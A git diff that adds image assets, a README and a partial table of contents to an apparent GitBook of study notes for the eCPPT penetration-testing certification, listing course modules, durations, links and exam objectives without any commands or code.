diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (1).png b/.gitbook/assets/Diagramma senza titolo.drawio (1).png new file mode 100644 index 0000000..6225b49 Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (1).png differ diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (4).png b/.gitbook/assets/Diagramma senza titolo.drawio (4).png new file mode 100644 index 0000000..640e4f7 Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (4).png differ diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (5) (1).png b/.gitbook/assets/Diagramma senza titolo.drawio (5) (1).png new file mode 100644 index 0000000..d382317 Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (5) (1).png differ diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (5) (2).png b/.gitbook/assets/Diagramma senza titolo.drawio (5) (2).png new file mode 100644 index 0000000..d382317 Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (5) (2).png differ diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (5).png b/.gitbook/assets/Diagramma senza titolo.drawio (5).png new file mode 100644 index 0000000..d382317 Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (5).png differ diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (6) (1).png b/.gitbook/assets/Diagramma senza titolo.drawio (6) (1).png new file mode 100644 index 0000000..1225d5c Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (6) (1).png differ diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (6).png b/.gitbook/assets/Diagramma senza titolo.drawio (6).png new file mode 100644 index 0000000..1225d5c Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (6).png differ diff --git a/.gitbook/assets/Schermata del 2023-08-03 17-41-40.png b/.gitbook/assets/Schermata del 2023-08-03 17-41-40.png new file mode 100644 index 0000000..ecb3f1d Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-03 17-41-40.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-03 17-53-19.png b/.gitbook/assets/Schermata del 2023-08-03 17-53-19.png new file mode 100644 index 0000000..9a268c5 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-03 17-53-19.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-03 18-15-13.png b/.gitbook/assets/Schermata del 2023-08-03 18-15-13.png new file mode 100644 index 0000000..43ccf81 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-03 18-15-13.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-20-09.png b/.gitbook/assets/Schermata del 2023-08-05 12-20-09.png new file mode 100644 index 0000000..5c62bb2 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-20-09.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-40-59.png b/.gitbook/assets/Schermata del 2023-08-05 12-40-59.png new file mode 100644 index 0000000..4091a8f Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-40-59.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-43-01.png b/.gitbook/assets/Schermata del 2023-08-05 12-43-01.png new file mode 100644 index 0000000..251d3bc Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-43-01.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-50-46.png b/.gitbook/assets/Schermata del 2023-08-05 12-50-46.png new file mode 100644 index 0000000..6ee4efe Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-50-46.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 18-41-30.png b/.gitbook/assets/Schermata del 2023-08-05 18-41-30.png new file mode 100644 index 0000000..e86fec7 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 18-41-30.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 18-44-30.png b/.gitbook/assets/Schermata del 2023-08-05 18-44-30.png new file mode 100644 index 0000000..94808ad Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 18-44-30.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 18-50-08.png b/.gitbook/assets/Schermata del 2023-08-05 18-50-08.png new file mode 100644 index 0000000..5b5d3b7 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 18-50-08.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 19-21-12.png b/.gitbook/assets/Schermata del 2023-08-05 19-21-12.png new file mode 100644 index 0000000..71a66e1 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 19-21-12.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-05 19-27-56.png b/.gitbook/assets/Schermata del 2023-08-05 19-27-56.png new file mode 100644 index 0000000..a558f7d Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 19-27-56.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-17-42.png b/.gitbook/assets/Schermata del 2023-08-06 12-17-42.png new file mode 100644 index 0000000..8d41c9a Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-17-42.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-19-41.png b/.gitbook/assets/Schermata del 2023-08-06 12-19-41.png new file mode 100644 index 0000000..5aa3afc Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-19-41.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-29-05.png b/.gitbook/assets/Schermata del 2023-08-06 12-29-05.png new file mode 100644 index 0000000..3b90293 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-29-05.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (1).png b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (1).png new file mode 100644 index 0000000..30e1fd6 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (1).png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (2).png b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (2).png new file mode 100644 index 0000000..30e1fd6 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (2).png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-31-55.png b/.gitbook/assets/Schermata del 2023-08-06 12-31-55.png new file mode 100644 index 0000000..30e1fd6 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-31-55.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 17-04-30.png b/.gitbook/assets/Schermata del 2023-08-06 17-04-30.png new file mode 100644 index 0000000..f29ff2b Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 17-04-30.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 17-05-19.png b/.gitbook/assets/Schermata del 2023-08-06 17-05-19.png new file mode 100644 index 0000000..165ed66 Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 17-05-19.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-06 17-20-52.png b/.gitbook/assets/Schermata del 2023-08-06 17-20-52.png new file mode 100644 index 0000000..8b7bbdf Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 17-20-52.png differ diff --git a/.gitbook/assets/Schermata del 2023-08-08 19-57-29.png b/.gitbook/assets/Schermata del 2023-08-08 19-57-29.png new file mode 100644 index 0000000..eec1b8c Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-08 19-57-29.png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png new file mode 100644 index 0000000..92a7edb Binary files /dev/null and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (10).png b/.gitbook/assets/image (10).png new file mode 100644 index 0000000..54fb0de Binary files /dev/null and b/.gitbook/assets/image (10).png differ diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png new file mode 100644 index 0000000..b2e50f6 Binary files /dev/null and b/.gitbook/assets/image (11).png differ diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png new file mode 100644 index 0000000..f747f0e Binary files /dev/null and b/.gitbook/assets/image (12).png differ diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png new file mode 100644 index 0000000..e3365d7 Binary files /dev/null and b/.gitbook/assets/image (13).png differ diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png new file mode 100644 index 0000000..6d6e50e Binary files /dev/null and b/.gitbook/assets/image (14).png differ diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png new file mode 100644 index 0000000..910e6c2 Binary files /dev/null and b/.gitbook/assets/image (15).png differ diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png new file mode 100644 index 0000000..486fbda Binary files /dev/null and b/.gitbook/assets/image (16).png differ diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png new file mode 100644 index 0000000..dbc6ba8 Binary files /dev/null and b/.gitbook/assets/image (17).png differ diff --git a/.gitbook/assets/image (18).png b/.gitbook/assets/image (18).png new file mode 100644 index 0000000..fe66127 Binary files /dev/null and b/.gitbook/assets/image (18).png differ diff --git a/.gitbook/assets/image (19).png b/.gitbook/assets/image (19).png new file mode 100644 index 0000000..c78b470 Binary files /dev/null and b/.gitbook/assets/image (19).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png new file mode 100644 index 0000000..92a7edb Binary files /dev/null and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (20).png b/.gitbook/assets/image (20).png new file mode 100644 index 0000000..e7c3e7f Binary files /dev/null and b/.gitbook/assets/image (20).png differ diff --git a/.gitbook/assets/image (21).png b/.gitbook/assets/image (21).png new file mode 100644 index 0000000..ab58c85 Binary files /dev/null and b/.gitbook/assets/image (21).png differ diff --git a/.gitbook/assets/image (22).png b/.gitbook/assets/image (22).png new file mode 100644 index 0000000..4c3ffc3 Binary files /dev/null and b/.gitbook/assets/image (22).png differ diff --git a/.gitbook/assets/image (23).png b/.gitbook/assets/image (23).png new file mode 100644 index 0000000..4e389a8 Binary files /dev/null and b/.gitbook/assets/image (23).png differ diff --git a/.gitbook/assets/image (24).png b/.gitbook/assets/image (24).png new file mode 100644 index 0000000..ad76a01 Binary files /dev/null and b/.gitbook/assets/image (24).png differ diff --git a/.gitbook/assets/image (25).png b/.gitbook/assets/image (25).png new file mode 100644 index 0000000..129ff14 Binary files /dev/null and b/.gitbook/assets/image (25).png differ diff --git a/.gitbook/assets/image (26).png b/.gitbook/assets/image (26).png new file mode 100644 index 0000000..9c0d441 Binary files /dev/null and b/.gitbook/assets/image (26).png differ diff --git a/.gitbook/assets/image (27).png b/.gitbook/assets/image (27).png new file mode 100644 index 0000000..8d20b43 Binary files /dev/null and b/.gitbook/assets/image (27).png differ diff --git a/.gitbook/assets/image (28).png b/.gitbook/assets/image (28).png new file mode 100644 index 0000000..01c8233 Binary files /dev/null and b/.gitbook/assets/image (28).png differ diff --git a/.gitbook/assets/image (29).png b/.gitbook/assets/image (29).png new file mode 100644 index 0000000..3b180eb Binary files /dev/null and b/.gitbook/assets/image (29).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png new file mode 100644 index 0000000..be7c436 Binary files /dev/null and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (30).png b/.gitbook/assets/image (30).png new file mode 100644 index 0000000..cffd1b4 Binary files /dev/null and b/.gitbook/assets/image (30).png differ diff --git a/.gitbook/assets/image (31).png b/.gitbook/assets/image (31).png new file mode 100644 index 0000000..9c0d441 Binary files /dev/null and b/.gitbook/assets/image (31).png differ diff --git a/.gitbook/assets/image (32).png b/.gitbook/assets/image (32).png new file mode 100644 index 0000000..8d20b43 Binary files /dev/null and b/.gitbook/assets/image (32).png differ diff --git a/.gitbook/assets/image (33).png b/.gitbook/assets/image (33).png new file mode 100644 index 0000000..a8cea0a Binary files /dev/null and b/.gitbook/assets/image (33).png differ diff --git a/.gitbook/assets/image (34).png b/.gitbook/assets/image (34).png new file mode 100644 index 0000000..558435c Binary files /dev/null and b/.gitbook/assets/image (34).png differ diff --git a/.gitbook/assets/image (35).png b/.gitbook/assets/image (35).png new file mode 100644 index 0000000..dbbf0b0 Binary files /dev/null and b/.gitbook/assets/image (35).png differ diff --git a/.gitbook/assets/image (36).png b/.gitbook/assets/image (36).png new file mode 100644 index 0000000..1e15cbb Binary files /dev/null and b/.gitbook/assets/image (36).png differ diff --git a/.gitbook/assets/image (37).png b/.gitbook/assets/image (37).png new file mode 100644 index 0000000..a1d94f3 Binary files /dev/null and b/.gitbook/assets/image (37).png differ diff --git a/.gitbook/assets/image (38).png b/.gitbook/assets/image (38).png new file mode 100644 index 0000000..4e1f43a Binary files /dev/null and b/.gitbook/assets/image (38).png differ diff --git a/.gitbook/assets/image (39).png b/.gitbook/assets/image (39).png new file mode 100644 index 0000000..716ba42 Binary files /dev/null and b/.gitbook/assets/image (39).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png new file mode 100644 index 0000000..e2d4385 Binary files /dev/null and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (40).png b/.gitbook/assets/image (40).png new file mode 100644 index 0000000..985f3a9 Binary files /dev/null and b/.gitbook/assets/image (40).png differ diff --git a/.gitbook/assets/image (41).png b/.gitbook/assets/image (41).png new file mode 100644 index 0000000..5e420f9 Binary files /dev/null and b/.gitbook/assets/image (41).png differ diff --git a/.gitbook/assets/image (42).png b/.gitbook/assets/image (42).png new file mode 100644 index 0000000..e0e6439 Binary files /dev/null and b/.gitbook/assets/image (42).png differ diff --git a/.gitbook/assets/image (43).png b/.gitbook/assets/image (43).png new file mode 100644 index 0000000..a4a29aa Binary files /dev/null and b/.gitbook/assets/image (43).png differ diff --git a/.gitbook/assets/image (44).png b/.gitbook/assets/image (44).png new file mode 100644 index 0000000..9060227 Binary files /dev/null and b/.gitbook/assets/image (44).png differ diff --git a/.gitbook/assets/image (45).png b/.gitbook/assets/image (45).png new file mode 100644 index 0000000..628de37 Binary files /dev/null and b/.gitbook/assets/image (45).png differ diff --git a/.gitbook/assets/image (46).png b/.gitbook/assets/image (46).png new file mode 100644 index 0000000..f365f7a Binary files /dev/null and b/.gitbook/assets/image (46).png differ diff --git a/.gitbook/assets/image (47).png b/.gitbook/assets/image (47).png new file mode 100644 index 0000000..061f7c9 Binary files /dev/null and b/.gitbook/assets/image (47).png differ diff --git a/.gitbook/assets/image (48).png b/.gitbook/assets/image (48).png new file mode 100644 index 0000000..bb0b76d Binary files /dev/null and b/.gitbook/assets/image (48).png differ diff --git a/.gitbook/assets/image (49).png b/.gitbook/assets/image (49).png new file mode 100644 index 0000000..c9e9072 Binary files /dev/null and b/.gitbook/assets/image (49).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png new file mode 100644 index 0000000..873987d Binary files /dev/null and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image (50).png b/.gitbook/assets/image (50).png new file mode 100644 index 0000000..aca231d Binary files /dev/null and b/.gitbook/assets/image (50).png differ diff --git a/.gitbook/assets/image (51).png b/.gitbook/assets/image (51).png new file mode 100644 index 0000000..62934e6 Binary files /dev/null and b/.gitbook/assets/image (51).png differ diff --git a/.gitbook/assets/image (52).png b/.gitbook/assets/image (52).png new file mode 100644 index 0000000..f6de218 Binary files /dev/null and b/.gitbook/assets/image (52).png differ diff --git a/.gitbook/assets/image (53).png b/.gitbook/assets/image (53).png new file mode 100644 index 0000000..d3de2f1 Binary files /dev/null and b/.gitbook/assets/image (53).png differ diff --git a/.gitbook/assets/image (54).png b/.gitbook/assets/image (54).png new file mode 100644 index 0000000..d3de2f1 Binary files /dev/null and b/.gitbook/assets/image (54).png differ diff --git a/.gitbook/assets/image (55).png b/.gitbook/assets/image (55).png new file mode 100644 index 0000000..fb99296 Binary files /dev/null and b/.gitbook/assets/image (55).png differ diff --git a/.gitbook/assets/image (56).png b/.gitbook/assets/image (56).png new file mode 100644 index 0000000..d7f0f47 Binary files /dev/null and b/.gitbook/assets/image (56).png differ diff --git a/.gitbook/assets/image (57).png b/.gitbook/assets/image (57).png new file mode 100644 index 0000000..0f521bd Binary files /dev/null and b/.gitbook/assets/image (57).png differ diff --git a/.gitbook/assets/image (58).png b/.gitbook/assets/image (58).png new file mode 100644 index 0000000..607c85f Binary files /dev/null and b/.gitbook/assets/image (58).png differ diff --git a/.gitbook/assets/image (59).png b/.gitbook/assets/image (59).png new file mode 100644 index 0000000..787df9e Binary files /dev/null and b/.gitbook/assets/image (59).png differ diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png new file mode 100644 index 0000000..33fc12a Binary files /dev/null and b/.gitbook/assets/image (6).png differ diff --git a/.gitbook/assets/image (60).png b/.gitbook/assets/image (60).png new file mode 100644 index 0000000..e5df3cd Binary files /dev/null and b/.gitbook/assets/image (60).png differ diff --git a/.gitbook/assets/image (61).png b/.gitbook/assets/image (61).png new file mode 100644 index 0000000..2049459 Binary files /dev/null and b/.gitbook/assets/image (61).png differ diff --git a/.gitbook/assets/image (62).png b/.gitbook/assets/image (62).png new file mode 100644 index 0000000..2049459 Binary files /dev/null and b/.gitbook/assets/image (62).png differ diff --git a/.gitbook/assets/image (63).png b/.gitbook/assets/image (63).png new file mode 100644 index 0000000..ef3fa51 Binary files /dev/null and b/.gitbook/assets/image (63).png differ diff --git a/.gitbook/assets/image (64).png b/.gitbook/assets/image (64).png new file mode 100644 index 0000000..ddc5334 Binary files /dev/null and b/.gitbook/assets/image (64).png differ diff --git a/.gitbook/assets/image (65).png b/.gitbook/assets/image (65).png new file mode 100644 index 0000000..1b66d35 Binary files /dev/null and b/.gitbook/assets/image (65).png differ diff --git a/.gitbook/assets/image (66).png b/.gitbook/assets/image (66).png new file mode 100644 index 0000000..7db4bf4 Binary files /dev/null and b/.gitbook/assets/image (66).png differ diff --git a/.gitbook/assets/image (67).png b/.gitbook/assets/image (67).png new file mode 100644 index 0000000..7db4bf4 Binary files /dev/null and b/.gitbook/assets/image (67).png differ diff --git a/.gitbook/assets/image (68).png b/.gitbook/assets/image (68).png new file mode 100644 index 0000000..9323033 Binary files /dev/null and b/.gitbook/assets/image (68).png differ diff --git a/.gitbook/assets/image (69).png b/.gitbook/assets/image (69).png new file mode 100644 index 0000000..ef2b7e4 Binary files /dev/null and b/.gitbook/assets/image (69).png differ diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png new file mode 100644 index 0000000..66eea6d Binary files /dev/null and b/.gitbook/assets/image (7).png differ diff --git a/.gitbook/assets/image (70).png b/.gitbook/assets/image (70).png new file mode 100644 index 0000000..e1d632b Binary files /dev/null and b/.gitbook/assets/image (70).png differ diff --git a/.gitbook/assets/image (71).png b/.gitbook/assets/image (71).png new file mode 100644 index 0000000..8969970 Binary files /dev/null and b/.gitbook/assets/image (71).png differ diff --git a/.gitbook/assets/image (72).png b/.gitbook/assets/image (72).png new file mode 100644 index 0000000..62ea8dc Binary files /dev/null and b/.gitbook/assets/image (72).png differ diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (73).png new file mode 100644 index 0000000..0799661 Binary files /dev/null and b/.gitbook/assets/image (73).png differ diff --git a/.gitbook/assets/image (74).png b/.gitbook/assets/image (74).png new file mode 100644 index 0000000..460d84e Binary files /dev/null and b/.gitbook/assets/image (74).png differ diff --git a/.gitbook/assets/image (75).png b/.gitbook/assets/image (75).png new file mode 100644 index 0000000..3acadb3 Binary files /dev/null and b/.gitbook/assets/image (75).png differ diff --git a/.gitbook/assets/image (76).png b/.gitbook/assets/image (76).png new file mode 100644 index 0000000..5e845a4 Binary files /dev/null and b/.gitbook/assets/image (76).png differ diff --git a/.gitbook/assets/image (77).png b/.gitbook/assets/image (77).png new file mode 100644 index 0000000..0dcf522 Binary files /dev/null and b/.gitbook/assets/image (77).png differ diff --git a/.gitbook/assets/image (78).png b/.gitbook/assets/image (78).png new file mode 100644 index 0000000..8d219d8 Binary files /dev/null and b/.gitbook/assets/image (78).png differ diff --git a/.gitbook/assets/image (79).png b/.gitbook/assets/image (79).png new file mode 100644 index 0000000..81998f3 Binary files /dev/null and b/.gitbook/assets/image (79).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png new file mode 100644 index 0000000..66eea6d Binary files /dev/null and b/.gitbook/assets/image (8).png differ diff --git a/.gitbook/assets/image (80).png b/.gitbook/assets/image (80).png new file mode 100644 index 0000000..3ee8d96 Binary files /dev/null and b/.gitbook/assets/image (80).png differ diff --git a/.gitbook/assets/image (81).png b/.gitbook/assets/image (81).png new file mode 100644 index 0000000..9a6df2e Binary files /dev/null and b/.gitbook/assets/image (81).png differ diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png new file mode 100644 index 0000000..0a0c3c2 Binary files /dev/null and b/.gitbook/assets/image (9).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png new file mode 100644 index 0000000..53b76b8 Binary files /dev/null and b/.gitbook/assets/image.png differ diff --git a/.gitbook/assets/smb (1).gif b/.gitbook/assets/smb (1).gif new file mode 100644 index 0000000..a894aad Binary files /dev/null and b/.gitbook/assets/smb (1).gif differ diff --git a/.gitbook/assets/smb.gif b/.gitbook/assets/smb.gif new file mode 100644 index 0000000..a8b9c92 Binary files /dev/null and b/.gitbook/assets/smb.gif differ diff --git a/README.md b/README.md index 5154eac..cf8bf15 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,138 @@ -# eCPPTv3-Notes -INE/eLearnSecurity Certified Professional Penetration Tester (eCPPT) / PTP v2 and v3 Notes +--- +description: >- + INE/eLearnSecurity Certified Professional Penetration Tester (eCPPT) / PTP v2 + and v3 Notes +--- + +# ๐Ÿ“ eCPPT / PTP - Notes + +
+ +## ๐Ÿ“• eCPPT - Version 3 (newest - after 2024) + +### Course duration & Topics โณ๐Ÿ“š + +\~ 107 hours (_`~97 of videos`_) **10** courses , **172** videos, **124** quizzes, **67** labs + +* [**Resource Development & Initial Access**](readme/ecpptv3/powershell-for-pt/) \~ 22 hours +* [**Web Application Attacks** ](readme/ecpptv3/web-app-security/)\~ 14 hours +* [**Network Security**](readme/ecpptv3/network-security/) \~ 17 hours +* [**Exploit Development** ](readme/ecpptv3/system-security/)\~ 7 hours +* [**Post Exploitation**](readme/ecpptv3/linux-exploitation/) \~ 18 hours +* [**Red Teaming**](readme/ecpptv3/wi-fi-security/) \~ 19 hours + +๐Ÿ›ฃ๏ธ [**RoadMap / Exam Preparation** ](roadmap-and-my-experience.md)๐Ÿง‘๐Ÿปโ€๐Ÿซ + +### E-Links ๐Ÿ”—๐Ÿ“” + +* Where to find the eCPPTv3 certification exam? - [eCPPTv3](https://security.ine.com/certifications/ecppt-certification/) +* Where to find the PTPv3 (Professional Penetration Testing v3) course [INE Learning Pathsโ€‹](https://my.ine.com/CyberSecurity/learning-paths/5e26d0ba-d258-49e0-a421-56cc06626f46/penetration-testing-professional-new-2024) + +โ€‹โ€‹[eCPPT](https://security.ine.com/certifications/ecppt-certification/) Exam ๐Ÿ“„๐Ÿ–Š๏ธ + +
+ +* **Time limit**: 24h +* **Expiration date**: yes +* **Objectives**: + + **Information Gathering & Reconnaissance** (10%) + + * Perform Host Discovery and Port Scanning on Target Networks + * Enumerate Information From Services Running on Open Ports + + **Initial Access** (15%) + + * Perform Username Enumeration to Identify Valid User Accounts on Target Systems + * Perform Password Spraying Attacks to Identify Valid Credentials for Initial Access + * Perform Brute-Force Attacks on Remote Access Services for Initial Access + + **Web Application Penetration Testing** (15%) + + * Perform Web Application Enumeration to Identify Potential Vulnerabilities & Misconfigurations + * Identify and Exploit Common Web Application Vulnerabilities For Initial Access (SQLi, XSS, Command Injection, etc) + * Perform Brute-Force Attacks Against Login Forms + * Exploit Vulnerable and Outdated Web Application Components + * Exfiltrate Data and Credentials From Compromised Web Applications and Databases + + **Exploitation & Post-Exploitation** (25%) + + * Identify and Exploit Vulnerabilities or Misconfigurations in Services + * Identify and Exploit Privilege Escalation Vulnerabilities + * Dump and Crack Password Hashes + * Identify Locally Stored Unsecured Credentials + + **Exploit Development** (5%) + + * Develop/Modify Exploit Code For Initial Access and Post-Exploitation + * Identify and Exploit Memory Corruption Vulnerabilities (Stack Overflow, Buffer Overflow) + + **Active Directory Penetration Testing** (30%) + + * Perform Active Directory Enumeration + * Identify Domain Accounts With Weak or Empty Passwords + * Perform AS-REP Roasting to Steal Kerberos Tickets for Authentication + * Perform Active Directory Lateral Movement Techniques (Pass-the-Hash, Pass-the-Ticket) + * Obtain Domain Admin Privileges/Access + +## Resources ๐Ÿ“‘๐Ÿ“˜ + +### ๐Ÿ‘‰ [eCPPT/PTP Cheat Sheet ](ecppt-cheat-sheet.md)๐Ÿ“” + +> ๐Ÿ“– [Read the Lab Guidelines](https://drive.google.com/file/d/1kgS7gerK5V5yJxOutb12IPMO1-FLf3Yw/view?usp=drive_link) ๐Ÿ“– + +*** + +

https://security.ine.com/certifications/ecppt-certification/

+ +## ๐Ÿ“™ eCPPT - Version 2 (until 2024) + +### Course duration & Topics โณ๐Ÿ“š + +\~ 84 hours (_`~56h of videos`_) **8** courses , **85** videos, **83** quizzes, **27** labs + +* **โ€‹**[**System Security**](readme/readme/system-security/) \~ 13 hours +* [**Network Security**](readme/readme/network-security/) \~ 33 hours +* [**PowerShell for Pentesters**](readme/readme/powershell-for-pt/) \~ 6 hours +* **โ€‹**[**Linux Exploitation**](readme/readme/linux-exploitation/) \~ 9 hours +* [**โ€‹Web App Security**](readme/readme/web-app-security/) \~ 10 hours +* **โ€‹**[**Wi-Fi Security**](readme/readme/wi-fi-security/) \~ 6 hours +* **โ€‹**[**Metasploit & Ruby**](readme/readme/metasploit-and-ruby/) \~ 8 hours + +๐Ÿ›ฃ๏ธ [**RoadMap / Exam Preparation** ](roadmap-and-my-experience.md)๐Ÿง‘๐Ÿปโ€๐Ÿซ + +### E-Links ๐Ÿ”—๐Ÿ“” + +* Where to find the PTPv2 (Professional Penetration Testing v2) course? - [INE Learning Paths](https://security.ine.com/certifications/ecppt-certification/)โ€‹ +* Where to find the eCPPTv2 certification exam? - [eCPPTv2](https://security.ine.com/certifications/ecppt-certification/)โ€‹ + +### โ€‹[eCPPT](https://security.ine.com/certifications/ecppt-certification/) Exam ๐Ÿ“„๐Ÿ–Š๏ธ + +* **Time limit**: 7 days + 7 days for report +* **Expiration date**: no +* **Objectives**: + * Penetration testing processes and methodologies, against Windows and Linux targets + * Vulnerability Assessment of Networks + * Vulnerability Assessment of Web Applications + * Advanced Exploitation with Metasploit + * Performing Attacks in Pivoting + * Web application Manual exploitation + * Information Gathering and Reconnaissance + * Scanning and Profiling the target + * Privilege escalation and Persistence + * Exploit Development + * Advanced Reporting skills and Remediation + +## Resources ๐Ÿ“‘๐Ÿ“˜ + +### ๐Ÿ‘‰ [eCPPT/PTP Cheat Sheet ](ecppt-cheat-sheet.md)๐Ÿ“” + +> ๐Ÿ“– [Read the Lab Guidelines](https://assets.ine.com/certifications/exam-guides/eCPPTv2_PRE_EXAM.pdf) ๐Ÿ“– + +*** + +## Other Resources ๐Ÿ“‘๐Ÿ“˜ + +### [๐Ÿ‘‰ Preparation RoadMap to pass eCPPT/PTP exam ๐Ÿ›ฃ๏ธ](roadmap-and-my-experience.md) + +### ๐Ÿ‘‰ [Exam Experience](https://medium.com/@dev-angelist/learning-path-my-experience-for-the-eccptv2-ptp-certification-april-2024-15ddf6b29a8f) (v2) ๐Ÿ’ฏ diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 0000000..6f834c9 --- /dev/null +++ b/SUMMARY.md @@ -0,0 +1,155 @@ +# Table of contents + +* [๐Ÿ“ eCPPT / PTP - Notes](README.md) + * [eCPPTv3](readme/ecpptv3/README.md) + * [1๏ธโƒฃ 1 - Resource Development & Initial Access](readme/ecpptv3/powershell-for-pt/README.md) + * [1.1 - PowerShell for Pentesters](readme/ecpptv3/powershell-for-pt/3.1.md) + * [1.2 - Client-Side Attacks](readme/ecpptv3/powershell-for-pt/network-security/README.md) + * [1.2.1 - System/Host Based Attacks](readme/ecpptv3/powershell-for-pt/network-security/2.1/README.md) + * [1.2.1.1 Windows Vulnerabilities](readme/ecpptv3/powershell-for-pt/network-security/2.1/windows-vulnerabilities.md) + * [1.2.2 - The Metasploit Framework (MSF)](readme/ecpptv3/powershell-for-pt/network-security/2.3/README.md) + * [1.2.2.1 MSF Introduction](readme/ecpptv3/powershell-for-pt/network-security/2.3/msf-introduction.md) + * [1.2.2.2 Information Gathering & Enumeration](readme/ecpptv3/powershell-for-pt/network-security/2.3/information-gathering-and-enumeration.md) + * [1.2.2.3 Vulnerability Scanning](readme/ecpptv3/powershell-for-pt/network-security/2.3/vulnerability-scanning.md) + * [1.2.2.4 Client-Side Attacks](readme/ecpptv3/powershell-for-pt/network-security/2.3/client-side-attacks.md) + * [1.2.2.5 Post Exploitation](readme/ecpptv3/powershell-for-pt/network-security/2.3/post-exploitation.md) + * [1.2.2.6 Armitage](readme/ecpptv3/powershell-for-pt/network-security/2.3/armitage.md) + * [1.2.3 Exploitation](readme/ecpptv3/powershell-for-pt/network-security/2.4.md) + * [1.2.4 Social Engineering](readme/ecpptv3/powershell-for-pt/network-security/2.4-2.md) + * [2๏ธโƒฃ 2 - Web Application Penetration Testing](readme/ecpptv3/web-app-security/README.md) + * [2.1 - Web App Concepts](readme/ecpptv3/web-app-security/5.1-web-app-concepts/README.md) + * [2.1.1 HTTP/S Protocol](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.1-http-s-protocol.md) + * [2.1.2 Encoding](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.2-encoding.md) + * [2.1.3 Same 